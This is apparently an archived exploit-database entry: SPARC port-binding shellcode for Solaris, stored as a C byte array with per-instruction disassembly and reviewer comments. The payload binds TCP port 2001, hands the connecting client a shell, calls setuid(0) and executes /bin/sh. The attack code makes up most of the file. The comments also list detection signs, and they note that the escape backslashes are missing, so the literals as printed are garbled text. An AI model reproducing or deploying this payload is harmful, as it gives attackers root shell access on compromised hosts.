
# Title : solaris/SPARC portbinding shellcode
# Published : 2000-11-19
# Author : dopesquad.net


/*

  Solaris - Sparc -> www.dopesquad.net

*/

/*
 * Solaris/SPARC port-binding payload, stored as a C string of 32-bit SPARC
 * instruction words; every literal is paired with its disassembly.
 *
 * NOTE(review): in this copy the "\x" escape backslashes are missing from
 * every literal, so as printed the array holds ASCII text ("xa0x23...")
 * rather than the instruction words the comments describe.
 *
 * Reading the disassembly: the system call number is placed in %g1 and
 * "ta 0x8" traps into the kernel. %l7 is set to 16 and small constants are
 * built as %l7 +/- n, and zero is produced with xor, so that the encoded
 * words avoid zero bytes. The syscall names below follow Solaris numbering
 * (confirm against <sys/syscall.h> for the release in question).
 *
 * Sequence: create a TCP socket, bind it to port 2001 on the wildcard
 * address, listen, accept one connection, duplicate the accepted descriptor
 * onto 0/1/2, call setuid(0), then execve "/bin/sh"; exit(0) follows as the
 * fallback if execve returns.
 *
 * What a defender can observe from that sequence:
 *   - a new listener on TCP port 2001 owned by a process that did not
 *     previously listen (the port is an immediate in one instruction, so
 *     signatures should not key on the port alone);
 *   - a /bin/sh process whose stdin/stdout/stderr are all one socket;
 *   - setuid(0) immediately followed by execve in a network-facing process;
 *   - in memory or on the wire, the trap word 91 d0 38 08 repeated between
 *     short register-setup runs, plus the sethi constants for "/bin" and "/sh".
 * A non-executable user stack (Solaris noexec_user_stack) and inbound
 * filtering of unexpected ports both limit this class of payload.
 */
char shellcode[] =
  /* Scratch setup: %l0 = %sp - 16 (buffer address), %l7 = %sp - %l0 = 16,
     and the value 16 is stored at [%sp - 20] (later passed as the address
     length pointer to the accept call). */
  "xa0x23xa0x10"	/* sub    	%sp, 16, %l0 */
  "xaex23x80x10"	/* sub    	%sp, %l0, %l7 */
  "xeex23xbfxec"	/* st     	%l7, [%sp - 20] */
  /* %g1 = 16 + 214 = 230 (so_socket); arguments 2, 2, 0, 0, 1, i.e.
     presumably AF_INET, SOCK_STREAM, protocol 0, no device path, and the
     default socket version. */
  "x82x05xe0xd6"	/* add    	%l7, 214, %g1 */
  "x90x25xe0x0e"	/* sub    	%l7, 14, %o0 */
  "x92x25xe0x0e"	/* sub    	%l7, 14, %o1 */
  "x94x1cx40x11"	/* xor    	%l1, %l1, %o2 */
  "x96x1cx40x11"	/* xor    	%l1, %l1, %o3 */
  "x98x25xe0x0f"	/* sub    	%l7, 15, %o4 */
  "x91xd0x38x08"	/* ta     	0x8 */
  /* Keep the returned descriptor in %l2 (assumes %o2 is still zero after
     the trap, so the xor acts as a move). */
  "xa4x1ax80x08"	/* xor    	%o2, %o0, %l2 */
  /* Build the socket address at [%sp - 16]: halfword 2 (family, %o1 still
     holds 2), halfword 2001 (port), word 0 (wildcard address). */
  "xd2x33xbfxf0"	/* sth    	%o1, [%sp - 16] */
  "xacx10x27xd1"	/* mov    	2001, %l6 */
  "xecx33xbfxf2"	/* sth    	%l6, [%sp - 14] */
  "xc0x23xbfxf4"	/* st     	%g0, [%sp - 12] */
  /* %g1 = 232 (bind): descriptor, address buffer, length 16. %o3 is used as
     a zero register, so "xor %o3, X" copies X. */
  "x82x05xe0xd8"	/* add    	%l7, 216, %g1 */
  "x90x1axc0x12"	/* xor    	%o3, %l2, %o0 */
  "x92x1axc0x10"	/* xor    	%o3, %l0, %o1 */
  "x94x1axc0x17"	/* xor    	%o3, %l7, %o2 */
  "x91xd0x38x08"	/* ta     	0x8 */
  /* %g1 = 233 (listen): descriptor, backlog 16 - 11 = 5. */
  "x82x05xe0xd9"	/* add    	%l7, 217, %g1 */
  "x90x1axc0x12"	/* xor    	%o3, %l2, %o0 */
  "x92x25xe0x0b"	/* sub    	%l7, 11, %o1 */
  "x91xd0x38x08"	/* ta     	0x8 */
  /* %g1 = 234 (accept): descriptor, address buffer, pointer to the length
     word stored at [%sp - 20]. Blocks until a client connects. */
  "x82x05xe0xda"	/* add    	%l7, 218, %g1 */
  "x90x1axc0x12"	/* xor    	%o3, %l2, %o0 */
  "x92x1axc0x10"	/* xor    	%o3, %l0, %o1 */
  "x94x23xa0x14"	/* sub    	%sp, 20, %o2 */
  "x91xd0x38x08"	/* ta     	0x8 */
  /* Keep the accepted descriptor in %l3. */
  "xa6x1axc0x08"	/* xor    	%o3, %o0, %l3 */
  /* %g1 = 16 + 46 = 62 (fcntl) with command 16 - 7 = 9, presumably
     F_DUP2FD, issued three times with targets 0, 1 and 2. %g1 is set once
     and not reloaded before the second and third traps. */
  "x82x05xe0x2e"	/* add    	%l7, 46, %g1 */
  "x90x1axc0x13"	/* xor    	%o3, %l3, %o0 */
  "x92x25xe0x07"	/* sub    	%l7, 7, %o1 */
  "x94x1bx80x0e"	/* xor    	%sp, %sp, %o2 */
  "x91xd0x38x08"	/* ta     	0x8 */
  "x90x1axc0x13"	/* xor    	%o3, %l3, %o0 */
  "x92x25xe0x07"	/* sub    	%l7, 7, %o1 */
  "x94x02xe0x01"	/* add    	%o3, 1, %o2 */
  "x91xd0x38x08"	/* ta     	0x8 */
  "x90x1axc0x13"	/* xor    	%o3, %l3, %o0 */
  "x92x25xe0x07"	/* sub    	%l7, 7, %o1 */
  "x94x02xe0x02"	/* add    	%o3, 2, %o2 */
  "x91xd0x38x08"	/* ta     	0x8 */
  /* %g1 = 23 (setuid) with argument 0. */
  "x90x1bx80x0e"	/* xor    	%sp, %sp, %o0 */
  "x82x02xe0x17"	/* add    	%o3, 23, %g1 */
  "x91xd0x38x08"	/* ta     	0x8 */
  /* Build the path in %l0/%l1: 0x2f62696e is "/bin", 0x2f736800 is "/sh"
     plus a terminating zero byte. std writes the pair to [%sp - 16]; the
     argument vector { path, NULL } is written at [%sp - 8]. Then
     %g1 = 59 (execve) with path, argv and a null environment pointer. */
  "x21x0bxd8x9a"	/* sethi  	%hi(0x2f626800), %l0 */
  "xa0x14x21x6e"	/* or     	%l0, 0x16e, %l0	! 0x2f62696e */
  "x23x0bxdcxda"	/* sethi  	%hi(0x2f736800), %l1 */
  "x90x23xa0x10"	/* sub    	%sp, 16, %o0 */
  "x92x23xa0x08"	/* sub    	%sp, 8, %o1 */
  "x94x1bx80x0e"	/* xor    	%sp, %sp, %o2 */
  "xe0x3bxbfxf0"	/* std    	%l0, [%sp - 16] */
  "xd0x23xbfxf8"	/* st     	%o0, [%sp - 8] */
  "xc0x23xbfxfc"	/* st     	%g0, [%sp - 4] */
  "x82x02xe0x3b"	/* add    	%o3, 59, %g1 */
  "x91xd0x38x08"	/* ta     	0x8 */
  /* Reached only if execve returns: %g1 = 1 (exit) with status 0. */
  "x90x1bx80x0e"	/* xor    	%sp, %sp, %o0 */
  "x82x02xe0x01"	/* add    	%o3, 1, %g1 */
  "x91xd0x38x08"	/* ta     	0x8 */
;


